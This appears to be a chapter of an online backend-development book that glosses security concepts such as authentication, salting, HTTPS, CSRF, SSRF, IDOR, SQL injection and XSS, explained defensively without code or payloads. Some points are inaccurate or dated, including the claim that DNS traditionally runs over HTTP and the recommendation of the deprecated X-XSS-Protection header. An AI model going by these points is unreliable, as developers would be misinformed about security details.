Productionizing Backend Development

Introduction

This page lists the various terms that relate to securing the data in transit, data in rest and securing web service requests. Note that the list of concepts provided on this page is not exhaustive and many more tasks are required to completely secure an application. For example, physically securing the servers by setting firewall, installing only necessary software, updating/patching softwares, securing database via passwords, mitigation strategy DDoS attacks, updating version of dependency libraries, specially if a new major version is available per semantic versioning layout, etc. are some examples of securing an application that must also be performed. For purpose of securing data and web requests, the two main concepts in "security", if not the entirety of it, are Authentication and Authorization.

Authentication

An easy example to understand authetication is in context of a web application. When a web application receives requests from someone / somewhere, the application must identify the entity making the request and also prevent someone from mistakenly or attackingly assume identity of another user. To authenticate an entity is to get necessary information from them (like, username and password) and successfully relate it to a unique user entry stored on the server, database, etc. This ensures that "the entity making a request" is same as a given "user of the application". If a user cannot be authenticated, then they are marked as an "anonymous" user. Most applications still try to identify anonymous user by tagging them to the ip-address of the machine from where the request is originating, but this identification cannot be trusted, specially for critical operations. Authentication as a topic goes further detailed beyond simply collecting these a password and it is highly instructive to refer to this article at Wikipedia. As the application evolves and becomes more critical, it is highly suggested to enforce stronger authentication, like, Multifactor authentication (multifactor authentication is a big and important topic in itself and readers are encouraged to review it separately, even though it is not covered in the book). Note that even though the above article discusses "authentication" concept, it has a section towards the end titled "authorization". For this book, authentication and authorization are identified as separate concepts.

Password strength

See article about password strength at Wikipedia. Username and password combination have been the most commonly used method of authenticating an entity. Username, being public facing, can be easy to guess, and so, the load of preventing a compromised authentication comes down on having a strong password. A strong pasword must be used at all times wherever one is asked for, with different passwords for different systems, and also changing passwords regularly, at least after a major breach at any other company. A password manager can of great help and should be used as much possible. Do note to have separate password managers for personal and work use, so that you don't lose access of one or other unexpectedly.

Salting

See details about password salting here and here. The practice of password salting must be used whenever storing a user's password. It provides the benefit that in case of any data leaks / website breach, having a salted password prevents the raw password text provided by a user from getting leaked; And for normal use, having a salted passoword does not prevent the authentication process. It involves adding a string of between 32 or more characters to a password and then hashing it. However, salted passwords must also be iteratively hashed multiple times for this protection to work. Bcrypt is a good algorithm to use for password salting. MD5 and SHA must be avoided.

Authorization

See article about authorization at Wikipedia. While authentication relates to identifying the entity making a request with the user details stored in application, authorization relates to putting checks on the verified user or anonymous user from accessing data that they aren't allowed to access, or to perform any disallowed action on the data. By definition, authorization must happen only after authentication step has been completed.

Permission bits

See details about permission bits usage in setting traditional unix file permissions in this article at Wikipedia and NERSC. The permission bits give user the flexibility to configure directory and file permissions. Different permissions allowing read/write/excute, or combinations of them can be set for the file owner, the group that the file belong to, and for everyone else. Similar permissions can also be set for directories (however, execute permission on directory has different implications that execute permission on file).

Access control list, or ACL

See article about ACL at Wikipedia. An example of ACL can be seen here. ACLs take the behavior of "permission bits" described above to a more granular level. Different permissions can be set be individual users or groups. The permission corresponding to the first matching entry in the list is ascribed to the user.

Securing data in transit

See article about data in transit at Wikipedia. Data in transit refers to the data that flows over a network, either in the public or untrusted network such as the Internet, or in the confines of a private network such as a corporate or enterprise Local Area Network (LAN). Following quick references can be used to identify ways to secure data in transit (here and here). For web application, the quickest way to secure data in transit is by using HTTPS rather than HTTP for communication.

Man-in-the-middle attack, and need for HTTPS

See article about man-in-the-middle attach at Wikipedia and Norton. Using HTTP for communication and not encrypting data transferred between the client and server can allow someone to snoop the traffic and also modify it. Using HTTPS (references: Wikipedia, Cloudflare) encrypts the data communicated between client and server and thwarts these attcks. Recently, search engines (like, Google) have started to give higher ranking to web applications that provide HTTPS connection. While encryption / decryption does add some extra CPU cycles, these are still much faster than database and network latencies which are dominant factor contributing to the response latency. Thus, using rationale of "efficiency" for not having HTTPS configuration is not a valid reason (Reference: Cloudflare). Similaly, when communicating with different microservices within the organization, or invoking third-party api(s), it should also be done using HTTPS and not HTTP.

DNS over HTTPS

Domain Name System, or DNS (reference: Wikipedia, Cloudflare) is a decentralized naming system for websites that allows translating from understandable and memorizable text address to ip-address used by computers. When a client initiates a web request, the initial call made is to DNS servers (see here for more details on domain name resolution) after which subsequent HTTP/HTTPS communication with the target server occurs. The initial communication with the DNS is traditionally done over HTTP which can allow internet service providers (i.e., the company that provides you the internet service) to perform a "man-in-the-middle" attack to get information on the websites you (i.e. the client making the web request) are visiting. This can be alleviated by using HTTPS to perform initial DNS call, and is called DNS over HTTPS. For additional details on DNS Security, refer to tihs article at Cloudflare. Another alternative can also be for companies to host their own DNS servers to enable communication between different internal microservices and resources, and also to identify/control allowed third party api calls.

Securing data at rest

See article about data at rest at Wikipedia and Microsoft Azure. Data at rest refers to data that is housed physically on computer data storage in any digital form, including both structured and unstructured data. For a business application, it can include among other entries, database entries, files, logs, emails and alerts containing user data. If a server filesystem is duplicated (like, using RAID, or combination of cloud storage), then "data at rest" definition covers data stored at all such places. Securing data at rest primarily relies on adding password protection to access the corresponding resource and ensuring proper file permissions. On a per case basis, the operating system (or, OS) can be configured to encrypt all data being written onto the filesystem. Alternately, the application may itself decide to encrypt the data before sending to OS. Other precautions include storing hash value rather than plaintext if doing so can serve the purpose, stricter access restrictions and auditing of users who are retrieving / modifying this infomation. The goal is to keep a close watch on sensitive data and to have it be unusable by attackers even if the data is stolen.

Data disposal

As shown in an example in filesystem section of storage glossary, simply issuing a delete command for files does not actually delete it from the filesystem; And it is possible to retrieve data back from the disk that was previously deleted. As explained in articles here and here, this is a security vulnerability and business must take appropriate steps to ensure that data has been truely purged out of the disk or storage device before it is thrown.

Encryption and key rotation

See article about key rotation at Cryptomathic, Google cloud and at AWS. Encrypting sensitive data in database is the best way to ensure that it is not available to just anyone with access to the database. Since encryption keys are used in encrypting the data, it becomes important to secure the keys. Rotating the encryption key ensures that in the case of a data leak, the damage is contained and not all sensitive user data is compromised.

Securing web service request

Securing a web service entails authenticating the entity performing the request and identifying them as an existing user or an anonymous user, verifying that the authenticated user is authorized to perform the action that they are attempting and ensuring that if the server is communicating with any other infrastructure component while processing the user request, then it is not inadvertently performing any unauthorized actions on behalf of the user.

Authentication security of web request

HTTP requests are in themselves stateless. The way a HTTP request gets processed by the server does not depend on what pevious requests were made and what were the corresponding outcomes. In context of authentication, this means that each HTTP call must carry authentication information, and the server with individually authenticate every request before it is processed. While it is possible to send authentication details in the request body, doing so is discouraged because GET calls will not read request body and so, it becomes necessary to identify other means for sending authentication details at least for GET calls! A better alternative is to send authentication details via request header. Various ways to athenticate a request using a request header is discussed below. Note that since a user session is made after a successful authentication, so the various tools provided by modern web application frameworks for managing user session help in preventing session related attacks, like, session fixation.

Basic authentication

See articles about basic autentication at Wikipedia, Mozilla docs and Swagger docs. The authentication information is sent in Authorization request header, and the corresponding header value starts with Basic prefix. NOTE to avoid confusion that authentication details are sent is a request header that is called "authorization", contrasting with the fact that for this book, authentication and authorization are two separate concepts. Also note that this authentication method MUST only be considered when making requests over secure HTTPS connection, else someone can listen to the request and get access to the header and through it, to the raw text password. The responsibility for collecting username and password, combining them in expected format for basic authentication, and then sending it with every call is the responsibility of the platform from where the call is made.

Bearer authentication (or Token authentication)

See articles about basic autentication at Swagger docs. It is similar to basic authentication in that the authentication information is sent in the Authorization request header. However, here the corresponding header value starts with Bearer prefix. Some web applications may instead use Token prefix. For a bearer authentication, an access code or token is provided in the header, with the understanding that anyone holding that code is identified as same user by the server. Either when the account is created for the first time, or after every password reset, or after every login (depending on how the web application is designed), the server can send a token back to the authenticated user, and subsequent requests can now use the token for authentication. An advantage over the basic authentication is that any attacks or accidental slip ups will reveal the token associated with the user, and it will not reveal the username and password. Any compromised token can be discarded and a new one regenerated.

In modern times, most requests to web services originate from web browsers, like Chrome, IE, Firefox, etc. Browsers are designed with some additional features that are not part of HTTP specification. One such behavior is that a cookie header associated with a domain is sent back to the server automatically in every request. For more details, see the glossary section on cookies. This allows using cookies for authentication, where the server sets a session-id cookie on user's browser after the user has successfully authenticated themselves. Any subsequent request made from the browser will now send all the cookies back to the server, including the session-id, and the server can use it to authenticate the user. NOTE that relying only on the cookies for authentication is not a secure practice and must be avoided; For more details see the section below on CSRF attack.

Token based authentication have some key advantages when compared to cookie based authentication. Few differences between the two are discussed here. An advantage of using cookies is that it is a mature concept and the web application developers on frontend and backend don't have to write and maintain custom code to manage cookies. However, if using tokens, then emulating behavior similar to cookie path, max-age and tags will require additional code. Storing headers for reuse and finally deleting them will require additional effort from developers, but this is automatically done for cookies for web browsers. On the other hand, using a token has some advantages over using a cookie. Since a cookie defines a user session on a single browser that is communicating with one server on a given domain, so, if the domain server needs to communicate with other domains, or if the webpage on the browser needs to communicate with other websites, then the same cookie cannot be used. On the other hand, a token can be reused among different systems, as long as each of them understand on how to process the token. Unlike a cookie, a token can also be copied from one browser to another on same or different computer, allowing a user to "move" their session from one system to another. The encryption key used for creating token can be rotated (reference) to achieve stronger levels of application security, which is not possible in a cookie.

Best of both can be achieved by using a token for a cookie. For example, configuring a "sticky session" behavior (Reference: StackOverflow) by storing complete session information in a cookie, or by using a shared backend database to get user details corresponding to a session-id cookie. Doing so allows the application to be "cloud-ready" where the user experience does not suffer if the server handling the user request suddenly breaks down, or if the user request is routed to a different server. Note that achieving sticky session by routing user request to same server is not a "cloud-ready" solution and should be avoided if possible.

Custom authentication headers

Web applications may choose to define and use custom request headers which are used for authenticating users. There is nothing disallowed in HTTP specifications against doing so. As described below in the section on CSRF attack, a custom header with same value as that passed in the cookie is a good way to prevent CSRF attack.

Authorization security of web request

This section covers various security issues in processing a web request that can arise if a request is not properly authorized.

Role based access control, or RBAC

See article about RBAC at Wikipedia. Note that RBAC is not a third party software; Instead it is access-control mechanism or architecture defined around roles and privileges. Hence, RBAC implementation can vary for different business. In the RBAC architecture, "roles" are identified and access to business resources (for example, access to REST endpoints) are authorized for corresponding roles. Each user is associated to role(s), and can only access the resources authroized for the role. RBAC also allows for there to be a hierarchical relation among the roles. RBAC authorization is easier to manage at corporate level because a user simply needs to be added-to / remove-from appropriate role to ensure their authorized interaction with the system; And for this reason it is preferred compared to having ACLs (reference: here and here).

Rate limiting, or Throttling

See articles about Throttling at Wikipedia and AWS. Throttling can be seen as a time-based authorization process wherein a user is disallowed to access API (or certain subsections) at a higher rate that an allowed value. From a business viewpoint, the most likely case for applying throttling is to enforce API access bounds set by payment tier subscribed by the user. Another important use case to apply throttling is to control access rate to resource-intensive APIs and to prevent system from becoming unresponsive.

OpenID and OAuth

See article about OpenID at Wikipedia. OpenID was designed to be decentralized authentication protocol that allows users to be authenticated by a trusted third party service. This eliminates the need for various web applications to provide their own ad hoc login systems and store user credentials. Instead, the OpenID allows users to log into multiple unrelated websites without having to have a separate identity and password for each. However, with the rise of companies like Google, Facebook, Twitter and the ecosystem of specific products and services offered by each, the user expectation is no longer limited to only having a centralized authentication. When visiting a third party websity, a user now wants the ability to be able to log in from the third party website to Google but only to make a calendar entry, or log into Facebook but only make a post on their wall. This requirement gave rise to OAuth which is an open standard for access delegation, commonly used as a way for users to grant websites or applications access to their information on other websites (like Google, Facebook, etc.) but without giving them the corresponding passwords. For more details on how OAuth is implemented, see articles here, here and here. Hence, the "Auth" in OAuth is actually "authorization", as in, it authorizes a third party to access user profile and services on host websites (like, Google, facebook, etc.). However, in doing so, the authorization provided is granular up to the user level and so, OAuth can also be used for authentication purpose (see here). This concept can be formalized to form OpenID Connect. Note that as of this writing, OAuth has 2 versions, and it is suggested to use the most recent one, i.e., OAuth2, for any development.

Insecure direct object references, or IDOR

See details about IDOR at OWASP, including ways to prevent it. IDOR occur when an application provides direct access to objects based on user input and without performing sufficient authorization checks. As a result of this vulnerability, attackers can bypass authorization and access resources in the system directly, for example database records or files. It can either include taking a filesystem path from user to retrieve file information but not checking if user is allowed access to the file, or even returning files from directory containing system data and not user data. Another example is returning database entries by reading one or more path and/or query parameters, and not verifying if the user is allowed access to the particular data, even if user-role allows them to access the general service. For example, consider a url path /department/sales/employee/{employeed-id} that allows a manager from sales department to view records of employee with id = {employee-id}. If the service only verifies that the user is a sales manager and authorizes them to use the above url path for any employee-id, regardless of whether the employee belongs in the sales department or not, then that would be an IDOR attack.

Additional security issues

This section covers other common security issues seen during web application development. Web application developers must aim to identify and prevent these vulnerabilities. By following the best practices suggested code development along with proper code reviews, most of these issues, if not all, can be identified and mitigated.

Useful security response headers

From personal experience, I very much appreciate the default security headers added in response by Spring security. Not all headers may be suitable for all web applications, but it is a good list of security response headers to review and tweak as necessary. Particularly, the default value for headers, except those for caching response, can be used, i.e., X-Content-Type-Options: nosniff, Strict-Transport-Security: max-age=31536000 ; includeSubDomains, X-Frame-Options: DENY, X-XSS-Protection: 1; mode=block. It is highly suggested to also review and set the content security policy (shown here) and referrer policy (shown here) response headers.

Cross-origin resource sharing, or CORS

See article about CORS at Wikipedia and Mozilla. In building a web application, it is common practice to use resources or services provided by a third party domain rather than spending time, effort and money in duplicating the service. CORS is a HTTP-header based mechanism that allows the third party domain / server to indicate any origins (domain, scheme, or port) other than its own from which a browser should permit loading resources. Performing AJAX requests is popular way to request for resources from any website. However, these requests can occur in background and without the user knowing when one is happening or even without waiting for them to provide an input. To prevent an unsuspecting user visiting a webpage from malicious cross-origin calls made automatically via the scripts on the page, browsers restrict all cross-origin HTTP requests initiated from scripts, as per the default same-origin security policy. CORS settings are applied on the server side by adding response headers to identify other domains that all allowed to make cross-origin request to it and what methods are allowed. These response headers are: Access-Control-Allow-Origin, Access-Control-Allow-Methods, Access-Control-Allow-Headers, Access-Control-Max-Age.

For developers, CORS is one of the issues that sneaks in totally unexpected. If in a time-pinch to develop something that will not get deployed to users and CORS is preventing progress, then there's a bypass to the problem using chrome's ModHeader plugin. See here.

Request forgery attacks

A request forgery attack is when the attacker sends a request, making it look/behave as if it was made by a valid user. Three attacks discussed below are CSRF, Login CSRF and SSRF attacks. Of these, CSRF is the most common of these attacks and a top level vulnerability in many applications.

Cross-site request forgery, or CSRF, or XSRF

See details about CSRF at Wikipedia, OWASP and at Spring security docs. To understand CSRF attack and prevention techniques, one must first understand about cookies, how browsers use cookies, how cookies can be used for authentication, and CORS. Primarily, CSRF attacks exploit the property of web browsers that they automatically include any cookies associated to a domain in any web request sent to that domain. This is done regardless of whether the request originates as a result of user opening a new tab and typing a url, or if the user clicks a link belonging to the domain that exists in some third party website, or if the call is made by a script running on a webpage that is hosted either under same domain or under a different domain. Particularly, the last case causes CSRF attack, where (1) a script running on some third party domain is able to make a web request to another target domain, (2) when this request is made, then the browser automatically sends cookies associated with the target domain, (3) at least one of the cookie that is automatically sent is used by the target domain for authentication, (4) all of the above happens without user knowing about it, (5) all of the above happens despite CORS settings on target domain.

To avoid a CSRF attack, one option is to not at all create any user session and not use cookies in any manner. A purely stateless, cookie-free, REST based communication will be free from CSRF attack. However, this may not always be possible, in which case, the best solution to preventing a CSRF attack is to double submit the value in a cookie, i.e. require a header containing same data as is present in cookie, an example shown in this article. Another article this describes why csrf tokens are necessary; CSRF token are an iplementation for double submit cookie pattern. Note that this solution relies on use of HTTPS, safe HTTP methods not executing side effects, proper CORS setting on server, and not having any XSS vulnerability. For more details on CSRF prevention, see OWASP Cheatsheet. Also, as much possible, the cookies set by the web application should also be secured as suggested here.

Spring security docs

Let's say that the website with CSRF insecure page uses a cookie for authentication that has samesite=strict setting. In this case, even without the using a double submit cookie, the CSRF attack will fail. However, not all browsers implement "samesite" setting (see browser compatibility), so it is a good idea to still uses double cookie submit. Additionally, if the frontend and backend are hosted on the different domain, then it is not possible to use samesite=strict setting otherwise the communication between the two will break.
The samesite=strict cookie setting may break some website features and from a business perspective, it may be preferable to instead use samesite=lax cookie setting. Although the latter setting restricts the cases in which a cookie can be sent, it is stil not a fool-proof way to avoid CSRF attack because the applications may not be designed properly, executing sensitive commands on a GET request, as mentioned here. So, it is still a good idea to use the double cookie submit pattern.
Let's say the CORS policy on target server are set such that it only allows requests from a particular origin; And, requests originating from the attacking website's origin is not allowed. Let's also say that the attacking script is making a simple request to the target server. To ensure that cookies are sent with the cross-origin request to the target server, let's say that a credentialed request is being made. Let's assume that samesite setting is not used in the cookie. In this case, is the double submit cookie necessary? Yes! The way cross-origin simple requests are executed by a browser, no pre-flight requests are made. Instead, the expected cross-origin request is sent to the server and any response obtained from the server is discarded by the browser. The important thing to note is that even though the server response is discarded by the browser, the server still successfully executes the request sent to it by the script on the attacking website. Hence, the attack is successful! And so, a double submit cookie pattern must be used on the target server to prevent this attack.
Let's consider above example, but instead a non-simple request is made by the script running on the attacking website. In this case, is the double submit cookie necessary? No! For such cases, the browser performs a pre-flight request before executing the desired cross-origin request. The response to the preflight request will let the browser know that the attacking website is disallowed from making cross-origin request to the target website; And so, the browser will not make the desired attack request. Thus, it is not necessary to use the double submit cookie pattern because no request will be made.
Let's consider the same example above of making a cross-origin request. However, in this case, let's say that the target server allows requests from two domains, domain-1.com and domain-2.com. In this case, is the double submit cookie on target website necessary to ensure that a CSRF attack initiated by a script hosted on domain-2.com for a user authenticated on domain-1.com does not succeed? Yes! If this scenario described here is allowed to proceed, then it will play out as a classic CSRF attack. However, the thing to notice for this case is that unlike the above scenarios, the response from the CORS request will not be rejected by the browser because domain-2.com is an allowed origin for making cross origin request to the target website. Thus, if CORS settings on the target website allows multiple or all origins (i.e., *), then the double submit cookie pattern prevents CSRF attack on GET requests that might reveal private data of a user to an attacker, in addition to the usual case of preventing CSRF attack on a POST request that might create new data or induce side effects.

Login CSRF is a CSRF attack done on login page. Unlike the other CSRF attacks, where the user is already logged in and the attacker's goal is to send a forged request that appears as coming from user, in the case of Login CSRF, the attacker's goal is to have the user login to a forged account and not realize that it does not belong to them. Any information added to this account is now available to the attacker. This StackOverflow post nicely describes progression of a login csrf attack and why it's considered an "attack" even though the target user never logged into their own account via the compromised login step. When coupled with a logout CSRF attack, a login CSRF can become an even more troubling issue, as shown here.

This OWASP article section provides suggestion on fixing the login csrf problem and without running into session fixation attack. A major difference between login CSRF and normal CSRF attack is that the login step involves setting a new cookie which was previously absent, while other CSRF attack try to reuse the cookie already in browser. This is the reason why busting login CSRF attack involves setting a session even for anonymous users. A similar suggestion for fixing login CSRF attack is also provided in this different article.

Server-side request forgery, or SSRF

See details about SSRF at Wikipedia, OWASP. Consider a scenario where a web application, named WA1, accepts an a url from user in the request body. As part of processing the request, the server should download the file from provided url if the user is autheorized to view the file, and finally send the file contents in response back to the user. Now consider that the business hosting this application also has some other application, named WA2, managing some internal files that must not be made available to outside users. SSRF attack would occur if an attacker makes a call to WA1 giving it a url pointing to WA2 for retrieval of internal files. The attack is successful if WA1 makes a request to WA2 requesting for internal file and authenticates itself as WA1, which is an interal user, rather than as the external user who initially made the call to WA1. In response, WA2 does not raise an error because WA1 is an internal user, and provides the internal file to it, which WA1 returns back to attacker. Had the attacker made a direct call to WA2, the request might have failed, but it does not fail when routed via WA1. Hence, a SSRF can be somewhat seen as an IDOR attack during an internal server-to-server communiation due to miscommunication of proper user authentication from one server to another. Resolving such issues requires ensuring that whenever there is a chain of request, then the incoming authentication credentials is the one getting used in subsequent requests, and it is not overwritten by a new authentication credential. As mentioned earlier, the token used in the token based authentication in the very first request coming from external user can be used by all other chained requests to avoid this attack. This is assuming that there is an enterprise level authentication system that can be used by various applications running within an organization to identify the user for a corresponding token.

Code injection

Code injection is the exploitation of a bug in software through which the attacker can change the expected course of execution. Two most famous injection vulnerabilities are SQL injection attack through which the values in database can be modified, and Cross-site scripting, or XSS attack through which code can be injected in a victim's HTML page. Injection attacks can also be used to assume another user's authentication, or to trigger a data loss. While there are different ways to handle injection attacks, all remediation suggestion broadly fall into the category of "when accepting untrusted data, i.e. any data from user, try to restrict its value as much possible to not deviate from expectation which can get misinterpreted by application and cause unintended side-effects". This is a very loosely defined statement, and worse, its scope can change as the software and related infrastructure evolves. Maybe your software application starts as a REST application and you don't worry about escaping html text when storing it. Over time, you add behavior allowing users to change html file to pdf, add suddenly your site becomes xss vulnerable! Hence, adherence to best practices and continuous monitoring is needed to ensure that the application is not susceptible to injection attacks.

SQL injection

SQL injection is an attack using the code injection technique, and is used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. SQL injection exploits a security vulnerability in an application's software when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. Here is a XKCD link that explains the attack and its mitigation in a very simple manner. The good news is that many web frameworks provide standard utilities to ensure that SQL injection attacks do not happen. Unless they are knowingly excluded, it's become less probably to fall victim to an SQL injection attack.

Cross-site scripting, or XSS

See details about XSS at Wikipedia, OWASP. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. For example, if a web application allows sending emails but it does not filter the email content to remove attacking scripts, then a xss attack can be effected by sending an email with malicious content to other users and having them open the email in browser. A troubling aspects of XSS is there are various ways to perform these attacks and it can occur anywhere a web application directly uses input from a user. As an extreme example, consider that xss attack can also occur if website tries to render user data as a pdf file. Two main solutions to handle XSS attack is to verify / sanitize any text entry taken from user and in the web-page, only incorporate user-data at certain locations. For more details on XSS prevention, see OWASP Cheatsheet.

Server side XSS

A server side xss is a XSS attack where another server is the victim of the attack. This may happens when unsafe user data is processed by a server as part of business workflow processing, at which time the attack is effected. This vulnerability can manifest itself in multiple ways. For example, as shown here, a server side XSS attack can happen when a html is processed and being converted to a pdf file. Or maybe the unsafe data got logged to file and was picked up by some other process that caused it to get attacked. Vulnerability to such attacks depends on analysis of the workflow and can change from one workflow to another. Generally, when dong any server-side processing of a user uploaded file, it should be done in a controlled virtual workspace so control such attacks from causing data leak to an outside domain, or to affect the server hosting the application.

Security related resources

The following resources are useful references for security related terminology, best practices, blogs, etc.

Center for Internet Security, or CIS

CIS home page can be found here. Particularly, note the 20 points guidelines provide dby CIS covering for various aspects of software security.

Mozilla WebAppSec

The Mozilla Web Application Security wiki provides a list of secure coding guidelines that is extremely useful.

Open Web Application Security Project, or OWASP

The OWASP is a nonprofit foundation that works to improve the security of software. OWASP Top 10 vulnerabilities is a good place to check the more common security issues that should be identified and rectified in an application. A complete list of OWASP projects can be found here.